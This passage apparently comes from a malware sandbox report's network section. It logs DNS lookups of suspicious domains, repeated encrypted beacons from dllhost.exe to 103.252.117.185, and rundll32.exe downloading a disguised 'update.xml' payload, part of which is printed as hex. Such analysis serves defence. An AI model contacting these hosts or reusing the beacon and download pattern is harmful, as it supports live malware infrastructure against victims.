Dec 19, 2024 14:49:32.143506050 CET	49923	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:32.535643101 CET	49923	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:32.655186892 CET	80	49923	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:49.156685114 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:49:49.205599070 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:49:49.509675980 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:49:49.814246893 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:49:49.818944931 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:49:49.934326887 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:49:54.072398901 CET	80	49923	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:54.072519064 CET	49923	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:54.072643995 CET	49923	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:57.195626974 CET	49983	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:57.315254927 CET	80	49983	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:57.315522909 CET	49983	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:57.583758116 CET	49983	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:57.703350067 CET	80	49983	103.252.117.185	192.168.2.6
Dec 19, 2024 14:50:19.229296923 CET	80	49983	103.252.117.185	192.168.2.6
Dec 19, 2024 14:50:19.229412079 CET	49983	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:19.229501009 CET	49983	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:22.352173090 CET	50028	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:22.471791983 CET	80	50028	103.252.117.185	192.168.2.6
Dec 19, 2024 14:50:22.471900940 CET	50028	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:22.851425886 CET	50028	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:22.971127987 CET	80	50028	103.252.117.185	192.168.2.6
Dec 19, 2024 14:50:34.179212093 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:50:34.226140022 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:50:35.994484901 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:50:36.114238024 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:50:44.401691914 CET	80	50028	103.252.117.185	192.168.2.6
Dec 19, 2024 14:50:44.401818037 CET	50028	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:44.401987076 CET	50028	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:47.523968935 CET	50029	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:47.644433022 CET	80	50029	103.252.117.185	192.168.2.6
Dec 19, 2024 14:50:47.644522905 CET	50029	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:47.892507076 CET	50029	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:50:48.012280941 CET	80	50029	103.252.117.185	192.168.2.6
Dec 19, 2024 14:51:09.558273077 CET	80	50029	103.252.117.185	192.168.2.6
Dec 19, 2024 14:51:09.558362007 CET	50029	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:09.562952042 CET	50029	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:12.680397987 CET	50030	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:12.800086021 CET	80	50030	103.252.117.185	192.168.2.6
Dec 19, 2024 14:51:12.800262928 CET	50030	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:13.058628082 CET	50030	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:13.178850889 CET	80	50030	103.252.117.185	192.168.2.6
Dec 19, 2024 14:51:19.204983950 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:51:19.257468939 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:51:22.417248964 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:51:22.537130117 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:51:34.715210915 CET	80	50030	103.252.117.185	192.168.2.6
Dec 19, 2024 14:51:34.715389013 CET	50030	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:34.715435982 CET	50030	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:37.836504936 CET	50031	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:37.956311941 CET	80	50031	103.252.117.185	192.168.2.6
Dec 19, 2024 14:51:37.956542015 CET	50031	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:38.220865011 CET	50031	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:51:38.340609074 CET	80	50031	103.252.117.185	192.168.2.6
Dec 19, 2024 14:51:38.340667963 CET	80	50031	103.252.117.185	192.168.2.6
Dec 19, 2024 14:52:00.244923115 CET	80	50031	103.252.117.185	192.168.2.6
Dec 19, 2024 14:52:00.245913982 CET	80	50031	103.252.117.185	192.168.2.6
Dec 19, 2024 14:52:00.246069908 CET	50031	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:52:00.249568939 CET	50031	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:52:03.367857933 CET	50032	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:52:03.487566948 CET	80	50032	103.252.117.185	192.168.2.6
Dec 19, 2024 14:52:03.488095045 CET	50032	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:52:03.693825960 CET	50032	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:52:03.814546108 CET	80	50032	103.252.117.185	192.168.2.6
Dec 19, 2024 14:52:04.301629066 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:52:04.351360083 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:52:08.887979984 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:52:09.008404970 CET	8081	49736	81.31.208.36	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 14:48:11.180367947 CET	60719	53	192.168.2.6	1.1.1.1
Dec 19, 2024 14:48:11.491463900 CET	53	60719	1.1.1.1	192.168.2.6
Dec 19, 2024 14:48:16.128643036 CET	52128	53	192.168.2.6	1.1.1.1
Dec 19, 2024 14:48:16.544238091 CET	53	52128	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 14:48:11.180367947 CET	192.168.2.6	1.1.1.1	0xd555	Standard query (0)	www.dj5a2sbj.icu	A (IP address)	IN (0x0001)	false
Dec 19, 2024 14:48:16.128643036 CET	192.168.2.6	1.1.1.1	0x1977	Standard query (0)	api.mods4ws.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 14:48:11.491463900 CET	1.1.1.1	192.168.2.6	0xd555	No error (0)	www.dj5a2sbj.icu	104.21.40.214	A (IP address)	IN (0x0001)	false
Dec 19, 2024 14:48:11.491463900 CET	1.1.1.1	192.168.2.6	0xd555	No error (0)	www.dj5a2sbj.icu	172.67.188.99	A (IP address)	IN (0x0001)	false
Dec 19, 2024 14:48:16.544238091 CET	1.1.1.1	192.168.2.6	0x1977	No error (0)	api.mods4ws.me	103.252.117.185	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dj5a2sbj.icu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49742	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:48:17.124227047 CET	807	OUT	Data Raw: 17 00 00 00 27 03 00 00 ea 40 10 07 01 37 7b a6 30 2f 5e d2 93 f4 40 17 60 35 4d c2 72 9e 13 be 43 db 00 c9 7e 98 a4 11 fd 8f e0 7f 99 75 60 50 85 7c c1 7a 7f f2 35 d7 cd f8 30 b1 b7 ef e3 bf 22 94 2b e1 9b 18 c4 e0 98 f1 14 38 f8 d9 cd b0 94 d8 Data Ascii: '@7{0/^@`5MrC~u`P\|z50"+8-X>\|?=w4R( UKwh+PShAgn*._^r]]IkH@x_8. aV ;s{vNIqOJL]l\|yx\|8#J<#9T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49806	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:48:42.487770081 CET	1063	OUT	Data Raw: 17 01 00 00 27 04 00 00 3b 98 06 70 92 2d 2b 23 66 7d dd 76 ee a5 a5 fc 26 20 6b 53 49 cd b1 06 4c 0e ed 49 7a 23 2e cb e8 43 d1 a1 e8 b9 25 35 b3 ff 55 ed 53 64 90 1b eb d6 f8 38 73 29 5b ab f2 18 1c 0b 6c ff 2a cf 94 1c ef 81 dc 54 51 62 53 f7 Data Ascii: ';p-+#f}v& kSILIz#.C%5USd8s)[lTQbS+.j::,d'yHMi"7~m}sm!p8;s\'AM!qjaX%IZKB1hJ~Zdk+'*Hq/\tkK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49869	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:49:07.415564060 CET	1021	OUT	Data Raw: ed 00 00 00 fd 03 00 00 c2 15 e4 94 73 7b fe 77 02 ad 3f b0 c0 88 3b 23 e7 ec 25 91 92 45 cf 7e 95 0d 74 7b bf 99 29 7e 73 37 4e 66 a7 34 71 c6 fc aa 0a ec e7 65 8f d7 c7 79 b8 e4 c1 49 b8 d2 f9 55 5c 69 0f 37 21 ad ac 92 3a 16 5e da 89 ec f8 72 Data Ascii: s{w?;#%E~t{)~s7Nf4qeyIU\i7!:^ra$lDQ0gXQq0f0]1l]+#"9Nk.tBu={\|\4JIKrCJt-"&,E0l@KRUP+pF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49923	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:49:32.535643101 CET	1171	OUT	Data Raw: 83 01 00 00 93 04 00 00 04 11 7d f6 bc 11 96 fd 9c 45 0f 31 2b aa ba d1 e1 ee ef 1b 72 a9 21 c8 8d 21 99 4e 21 48 30 01 3d 02 89 0f d1 08 b9 a6 66 74 15 07 75 3a 77 45 49 57 d0 41 ab 4c 8f 12 08 36 c4 2d d4 87 e3 89 af 9e f2 59 2d db 5a 6f 33 5d Data Ascii: }E1+r!!N!H0=ftu:wEIWAL6-Y-Zo3]u\k(MoZGlnE)glqHwKiP6#{jG@YnKpO;X{H)}7$s{I Ck$WU1V/t!}IGC'!KB~m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49983	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:49:57.583758116 CET	902	OUT	Data Raw: 76 00 00 00 86 03 00 00 68 41 f3 94 42 63 0a 9f d1 d1 42 4d ca 27 b2 a4 0a 4f 99 6a 0b 90 03 04 24 9d 16 7e f5 2c 1f 13 42 0a e3 54 39 19 81 67 aa f1 b3 4d f2 86 85 24 60 80 7f 62 04 89 6a 55 6b 2e 9e 96 88 e3 bf a3 ee 62 f8 3d 55 5a 6a 37 33 a3 Data Ascii: vhABcBM'Oj$~,BT9gM$`bjUk.b=UZj73'h@b3>ISZdgOf\|hJtF`Z.I6aZ<o*&J#iq~p.BTXErO$,NEVk.EBzcb5;Bf#h@bISZdgOf\|hJN`?\I6=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	50028	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:50:22.851425886 CET	1203	OUT	Data Raw: a3 01 00 00 b3 04 00 00 2f 89 1d ac 8b 28 cd f4 c4 69 0f 29 11 8c a4 4d ee c5 b1 c8 9a 0e eb d3 72 34 27 ca 9a 30 be 23 fc 24 a8 1a 6c 12 d7 12 56 7e a9 36 c5 92 71 a5 1c bc 14 a5 59 49 16 fd 29 86 5a 32 61 88 36 98 16 72 4c dd a5 25 c2 44 4d 45 Data Ascii: /(i)Mr4'0#$lV~6qYI)Z2a6rL%DME?~HW}a6uI\|>zf @UYB\|XbJk-V($&P4mx']6@~R:j@h6vURJY;zzHL*vC'M-j7_0t'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	50029	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:50:47.892507076 CET	975	OUT	Data Raw: bf 00 00 00 cf 03 00 00 82 1c ce 16 5e 2c e0 c6 2d 4e 21 dd 5d 8b a1 3c 26 1e cf ea 1c 58 32 47 23 e8 3f 6d 48 69 4d e5 a4 60 63 cf c3 d5 58 5c 6d 89 09 ea 32 bd fa df ec c8 b4 ab 32 be bc 84 b3 d5 b7 d0 e0 ef 68 01 6d 24 44 bb 82 f0 21 31 c6 66 Data Ascii: ^,-N!]<&X2G#?mHiM`cX\m22hm$D!1fK4.S^&&\|8=QWdI[DO7qj:=Z=}[4uLLYI[7%cVOJ]tmqz V2eKrC?m5\|`cm+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50030	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:51:13.058628082 CET	1233	OUT	Data Raw: c1 01 00 00 d1 04 00 00 e1 be 80 e5 de 4e 94 d9 10 a5 a8 ee 78 2f b0 42 ad 59 3a 60 73 7b 07 4b 0a 63 fe c7 0d 9b 53 01 51 64 55 75 ea b6 a2 04 77 48 ce 44 b9 0f df c0 ca f9 2b 44 6e 49 34 72 aa 5f a9 bb 91 bc c3 f1 7c cd d7 e7 5d fa 32 c1 ea e2 Data Ascii: Nx/BY:`s{KcSQdUuwHD+DnI4r_\|]21i)D{9kuQyk;UotT)<)0s=QO:GF2ER2 .o'Tp^mX_t)6wL]`2>B/b&K)+!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	50031	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:51:38.220865011 CET	1270	OUT	Data Raw: e6 01 00 00 f6 04 00 00 5c c7 dc d9 ad b0 88 89 9f 23 49 a9 ff de 34 14 23 84 2c f9 4a f4 14 9e a0 77 69 63 22 b3 7c 13 56 ee ac 9d 9f 70 39 e5 01 2d 07 05 b6 88 8d 89 37 59 7a 1a 7a af a0 31 d7 72 73 5d f3 2b 01 02 cf d2 da 51 a6 68 5e 47 a6 7f Data Ascii: \#I4#,Jwic"\|Vp9-7Yzz1rs]+Qh^G{aE:TKFGeY-Kkmc;+6~\K`,{M&Mf9\|wEkn[xWX`}><ZNvbm8b1j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	50032	103.252.117.185	80	7220	C:\Windows\SysWOW64\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:52:03.693825960 CET	1236	OUT	Data Raw: c4 01 00 00 d4 04 00 00 d5 c0 77 3e 61 04 be 29 a1 5e 89 2c 24 1a 30 6b da 65 a7 2e 16 27 ed 3d b1 bd 78 ca 57 a2 f4 84 b7 01 4e 7b 09 08 5e e1 fa e7 03 f7 c4 b0 0f ec c2 6b 9a 93 27 75 c5 b6 62 59 2c b1 cb b8 4b 5c e6 7e e5 c1 80 48 df 2d ca fd Data Ascii: w>a)^,$0ke.'=xWN{^k'ubY,K\~H-S"dW1Yf+?Jx:pPpp^4pF)',3Jzy\|\Bb_R9?0$BA%oc@(<'4Z[]\ 5w\s25? l[

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49725	104.21.40.214	443	5632	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 13:48:12 UTC	68	OUT	GET /yj/update.xml HTTP/1.1 Host: www.dj5a2sbj.icu Accept: /
2024-12-19 13:48:13 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:48:13 GMT Content-Type: text/xml Content-Length: 320512 Connection: close Last-Modified: Sun, 15 Dec 2024 02:29:11 GMT ETag: "675e3ef7-4e400" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60npSsSlUlrp7eaDWq%2B8hC26EOIyvUBwJUheGO9%2FHdWq1fu%2FawVrCGRkbdoDJO4GKtNDTvOlMgCB0ez4LZLfSlTomng3MpjstOx9PPDI1ylD1AH5W7nSrhoj087ffzldCwzh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f47d9557e3743ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1596&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=706&delivery_rate=1789215&cwnd=203&unsent_bytes=0&cid=f9682c34de58bf81&ts=875&x=0"
2024-12-19 13:48:13 UTC	512	IN	Data Raw: 28 a9 62 b7 f0 dc 23 d2 c5 a4 e7 83 c2 45 95 3d 09 a5 20 1e ae f5 1e 4a 14 cb 38 85 1e 36 36 57 30 4f 47 bb b8 e2 88 c2 e6 e9 79 08 bd b2 d0 2e 2d 75 ee e4 f6 03 05 0b 9d bf c6 c2 87 a1 c1 3c 17 fd 24 58 53 ad 5e 29 49 89 7a a0 fc a9 89 a8 82 3f b6 7c a2 4a d7 d7 2b 4c ab 40 8a 53 2d 7f b9 7b a5 46 ab ef 0b 32 21 ad e5 1c 32 8c 26 33 b3 8c b3 73 f6 9c 14 a0 ad 84 37 91 ca 53 e5 a1 6f 54 38 d1 41 9a 5a aa 66 7f d0 16 3a e1 b6 43 58 37 4b be b1 10 0d d0 73 80 9e 76 0a da 3e c6 26 fe d4 03 58 0b ba dc 95 80 22 80 92 35 73 9f e6 a6 48 0a 45 52 6b e4 5e 93 00 b3 46 43 ed 99 86 a4 79 41 d0 54 de 34 31 0c 3c 55 ea e3 0c 13 9f db 58 ee 56 25 c7 0f 81 a5 b3 57 ce dd cc 15 02 d0 5b 57 d2 c1 ad 05 ad 4f 5a 6b 62 61 b6 86 5c f9 71 8f 94 18 d0 ba 08 bb c1 28 5e 3d a8 Data Ascii: (b#E= J866W0OGy.-u<$XS^)Iz?\|J+L@S-{F2!2&3s7SoT8AZf:CX7Ksv>&X"5sHERk^FCyAT41<UXV%W[WOZkba\q(^=
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 38 5e 9d 4d 14 2c 5a d6 f6 eb 4a 89 f4 4e 6c 51 f5 2f 93 a1 2a e8 60 ad a7 7f 2b 14 9b 57 a0 d4 ca 24 cb 34 21 c4 aa 0e 83 bc 8e bb 9e 59 ce a0 f2 42 cb 8b 1d 9e 7a 03 5f 0d 1b 10 eb e1 7c 4e f5 e6 6d 53 66 56 d1 87 16 dd 72 b2 3f 2f 01 e2 b6 47 7d 1d d7 79 bc 5c bf d7 c4 b4 84 f7 c3 57 48 c7 79 66 e7 12 11 41 d6 a0 2b 80 1d 65 8e c7 49 36 cd d9 9c a8 3d 82 22 4e 2b c1 8b d2 30 64 d4 00 80 21 82 29 22 1b b1 4b ae 5c 99 c0 f5 fa b1 71 48 7d ef 2b f6 db df 3d d1 b7 76 7e 5e 55 e0 c1 09 b6 f8 c2 82 4b ba f1 e4 7d 9d 72 df e9 3e 0c 52 7a f5 83 2d 28 ad 73 87 08 78 ea 6d f9 4f 63 da 5d 36 84 fe e9 bc 20 70 07 ec 15 73 12 ef 06 26 ad 4f 33 59 ff fe de ae 50 d0 78 54 71 9c 36 9a 97 45 75 a6 42 ae b1 89 8a e1 cc e3 b3 ae 20 c4 21 6d 3c fc 92 da db 92 8d 31 cb 53 Data Ascii: 8^M,ZJNlQ/*`+W$4!YBz_\|NmSfVr?/G}y\WHyfA+eI6="N+0d!)"K\qH}+=v~^UK}r>Rz-(sxmOc]6 ps&O3YPxTq6EuB !m<1S
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: d4 4e ed f1 18 5f 5c 3a 58 5e 1d a1 2e 1d a1 56 60 ad f3 a8 89 64 c7 18 34 fe 0d 7d 2c cf 0b 1e 05 5d 9b 8f 32 a2 b6 c6 a4 6c db 35 b5 86 9e 7f c9 b3 1d 58 5c ad 3e b1 99 6b ca b1 8d a6 1f 35 cc d0 41 46 0a ed 07 d4 0e 8e c2 9a 43 16 7b 92 d4 22 43 f8 a4 73 65 8a ab f6 ad 0c 9c 86 02 8a 42 f4 91 c6 4d df 7f bb c5 00 53 89 85 4f 1a fe 8f 0b 57 2e db f1 b1 f0 9f 9a 45 bf 17 de 8f 06 cc 42 31 a8 c2 28 f9 b2 b1 d0 84 f0 d9 ad cf 22 b5 6b 64 c7 48 e1 df d8 e5 2e 4a 89 60 cf 00 ae bc 0f 4f c4 d2 03 85 37 2f 56 46 92 34 5c a1 e4 4f d7 48 e5 38 cc 86 1c 98 5e 31 b1 86 bf 0b bc b8 14 66 6f 9b dc b1 17 08 9a 6f f0 5b 95 2a 08 3b 93 9d 73 36 8f e6 63 5e aa a5 0e 64 d8 f2 f5 b8 ed 2d 23 45 de f5 29 d9 c4 91 98 f2 65 9e ee f5 6e 9f 35 2d cb 7a a3 46 d0 14 31 eb 0a 7d Data Ascii: N_\:X^.V`d4},]2l5X\>k5AFC{"CseBMSOW.EB1("kdH.J`O7/VF4\OH8^1foo[*;s6c^d-#E)en5-zF1}
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 62 dc 32 eb c1 38 c0 a3 08 3d 65 2c 06 3b 5c dc 2f cf 16 51 9a 03 73 13 2e c5 e5 0a 56 82 17 45 d1 dc 01 9e 2d 19 20 fc 41 c8 24 72 e4 63 30 74 dc a0 a6 80 4a 16 4d 1a d9 38 05 ff ef 32 6b 94 4f c5 95 de 7d 9e 9e 0f fd 33 e0 7b 41 de 20 73 bd 61 fd af e5 88 47 0e af 5b 97 37 b4 d1 b5 4f 64 c9 84 3d 98 c2 37 a9 35 9f 6a 75 f0 e4 4e 9a d5 9a 8f a8 6d ff de 59 4f 7a 30 be 02 10 b2 ea 54 d5 05 90 da f2 94 64 19 67 3f 68 9f 7d 05 80 30 af 84 85 3e 09 e2 68 30 0f 5a 86 f0 72 1e c5 96 05 a4 92 28 70 88 a3 26 81 2c e1 d6 64 64 4c 18 5c ab c7 6a e0 7c c0 2b 70 4d 51 07 f9 f3 35 8f 26 bb 07 91 fe 97 5c 10 ed 0e 44 5e aa 4a d3 8b f1 9c 96 d4 d9 f9 87 24 2d 87 f6 f4 56 65 b9 f0 36 e6 28 52 86 30 4c cf 39 19 ba 89 ac 50 48 78 3e 3c c3 6d 29 17 4a ff b6 57 cb d0 44 98 Data Ascii: b28=e,;\/Qs.VE- A$rc0tJM82kO}3{A saG[7Od=75juNmYOz0Tdg?h}0>h0Zr(p&,ddL\j\|+pMQ5&\D^J$-Ve6(R0L9PHx><m)JWD
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: eb b7 86 a1 24 3a 52 77 59 28 4a 18 72 a6 4b 6d c0 1f 87 ff 0a b0 ba e0 aa 80 07 df e8 ac 1c 59 30 32 18 a2 41 df ef c6 92 ad 52 47 d3 4e 21 66 c2 b5 8f 25 ff 2d 10 35 f7 a5 78 c9 36 3d 1a 59 bf 30 d2 54 03 e5 c3 b9 b2 7d 04 58 6c 28 f6 c4 1a 8a b8 4a d7 a8 f5 fd 1b e1 0c 43 29 ac a0 eb cf ba d7 f2 88 a3 bf e1 ea eb e1 71 8d f2 a0 64 17 fd 51 bd bb 36 fe de c4 3d c4 8b 72 f0 c9 66 45 91 f0 95 17 89 aa ac f1 bd c5 d6 ec 99 96 2a 01 74 86 42 45 a2 d6 00 0f 4b 7c 86 3c 3b 83 72 a0 65 be e9 3b ab 3d 99 cb cb 37 66 5b ef e2 82 05 aa 6a a5 9c ba a0 85 03 2f 13 f4 fd ed 19 14 53 05 9e 19 88 b2 94 5f e8 ee 83 0a a4 70 fa f2 6d 16 01 84 4d a1 fb 23 24 b3 d0 8a e4 2d 4f e1 b7 ad b4 28 ca 86 48 29 3e 34 8a 3d 2f ce 1e ad 73 1f 6b 23 31 a6 e1 2e 4f cc 47 48 8b 26 61 Data Ascii: $:RwY(JrKmY02ARGN!f%-5x6=Y0T}Xl(JC)qdQ6=rfE*tBEK\|<;re;=7f[j/S_pmM#$-O(H)>4=/sk#1.OGH&a
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: 17 c0 ce 7a f0 a4 4b 57 b6 7f 63 30 e2 0c a5 b4 73 c1 bc 60 41 a8 43 1c 39 32 ce 37 39 d0 a1 b1 d4 4c 96 43 98 7e 81 3d 2c 18 35 b2 56 66 89 dc 24 e2 6c f2 c8 45 0f 1e 76 71 e0 0a ff 42 32 1a 92 38 24 45 cf 93 4c 04 57 e9 c9 c9 42 61 58 60 32 b1 3b 77 d4 e5 ef 30 ff a5 b2 dd e4 37 2a 2d eb e2 5f df 80 37 74 1a 6d fb 9e 11 d4 46 56 13 a8 4a 69 59 2e 3c 71 ca fd 44 46 00 60 96 86 c9 a5 c9 dc 05 ad c9 47 29 2b a7 52 db dc 85 fa fe e8 2b c6 88 50 2c c6 ea 9a ab 34 8a 5d 3e 1b ef 32 2c d2 d1 bf 55 20 5e 0a 19 f3 72 fd c7 07 50 30 fa c5 42 b3 35 67 0e e0 04 c7 c5 18 d4 27 fb b1 0d b9 27 9c f1 e9 a9 9c 44 89 1b 09 ee a4 af c5 40 0e 1a b9 00 9d bd 19 b8 2c 5b 4b 9f 69 8e 9c 22 be fc c7 b5 de 11 df b0 fa 01 7d 0f 13 0f f1 91 5d 9f 8b 5c aa a5 8b dc 44 25 46 32 14 Data Ascii: zKWc0s`AC9279LC~=,5Vf$lEvqB28$ELWBaX`2;w07*-_7tmFVJiY.<qDF`G)+R+P,4]>2,U ^rP0B5g''D@,[Ki"}]\D%F2
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: f4 0c af e5 75 cf 36 28 b6 ac af c2 4a 17 0c de 46 d0 d0 52 ff 94 12 b0 6b f1 6e 8e 61 9e 50 dd 40 12 d6 f1 67 ff ee 9d 3e 27 cc 95 0b fb d2 1b 08 1a 1a 1c f5 b3 b8 60 cc e5 f7 a4 63 dc 15 fa 76 68 09 a0 8b 58 87 96 0a fa a4 fc a5 d5 44 23 4b bc 06 81 82 84 67 b4 89 11 1d 67 77 59 9a 3f 70 f7 00 f7 44 d9 49 64 cb 21 1a 09 a5 44 38 5d eb 8a 86 83 53 1c b9 50 3f 66 9e 80 fb b5 fc f8 90 d0 4b 8a 68 08 6a d6 32 82 13 94 44 de 76 45 2f e7 46 21 02 30 51 90 89 33 bf 51 c0 83 fc a2 e5 22 ab 5b 8c b9 47 55 5d bc 8e 54 65 16 c6 0c 34 63 57 d4 84 d1 4e 36 ba 05 d5 88 56 f3 80 25 a4 ae 22 b2 1d 41 9c 13 a0 3a 8b a4 53 b5 f9 32 14 ab 4a 94 96 93 84 ef e8 1d 4a cb 4b 2e bc de 14 a0 8b c5 0e 75 86 8d 52 6b eb 35 5b ff 90 84 64 47 29 3c 38 a8 40 c1 2f 4d cd 2b 84 e3 e4 Data Ascii: u6(JFRknaP@g>'`cvhXD#KggwY?pDId!D8]SP?fKhj2DvE/F!0Q3Q"[GU]Te4cWN6V%"A:S2JJK.uRk5[dG)<8@/M+
2024-12-19 13:48:13 UTC	1369	IN	Data Raw: dc 85 12 ea 6c b2 e6 2b a5 42 6d 04 17 4a 34 b2 94 df 07 29 58 df a6 cd a9 01 d5 1a c1 61 e6 b9 41 ed 55 3a d2 d2 4a b9 44 ff a4 e1 2d d7 e6 3a 4f 5f 07 5a 96 6f 9d b2 2e fb 05 84 07 9f 48 b9 0f 0d 29 45 dd 5d 2f 54 5d c6 bb 3d 1f 01 65 4a 32 e4 9b df 7a 89 77 5e 29 02 b4 35 e1 c4 44 09 78 0a f8 b5 a6 73 f1 d9 5b d4 61 87 31 cc a6 8c e6 f8 70 ed 9b 48 b4 c4 e1 b0 d9 ef 8b 43 7d 5a 15 a7 f3 62 46 72 8f 00 ff 80 cd 0f ba 7e 8a c2 f4 26 c9 1b 10 75 a8 fb 19 02 9b c9 0c 7b 7a be 13 40 33 f3 5f 4f 76 c2 65 47 2b 42 ab d0 98 e5 83 ad 9a 67 4c 21 97 bc a1 14 10 84 a1 0f 45 c7 47 d2 ff ee 9e b6 d4 27 ae 8c 6d a4 86 b8 38 67 4e 8d 3b d9 6d be cd 62 92 68 53 e6 ab a4 79 33 b2 de a1 35 a2 21 7b e8 72 2c cc a0 9d 08 30 d3 1f d1 dd 9a e6 12 bb 0f d4 bc ff 5b 85 9b 91 Data Ascii: 